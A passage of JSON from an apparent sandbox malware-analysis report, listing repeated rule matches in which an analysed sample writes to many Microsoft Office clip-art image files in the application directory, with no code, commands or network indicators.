office\\clipart\\pub60cor\\j0145168.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35571", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145168.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35582", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35595", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145272.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145361.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35608", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145361.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35617", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145669.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35626", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145669.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145707.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35635", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145707.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35646", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145810.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145879.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35657", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145879.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35668", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35679", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35690", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148309.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35701", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148309.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148757.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35712", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148757.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148798.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35727", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148798.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149018.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35738", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149018.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149118.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35747", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149118.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150150.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35760", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150150.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150861.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35771", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150861.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151041.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35778", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151041.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151045.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35785", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151045.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151047.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35792", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151047.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151055.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35801", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151055.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151061.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35808", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151061.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151063.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35815", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151063.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35822", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35829", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35836", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35843", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152430.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35852", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152430.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152432.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35859", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152432.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35868", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152556.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35875", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152556.wmf\".", 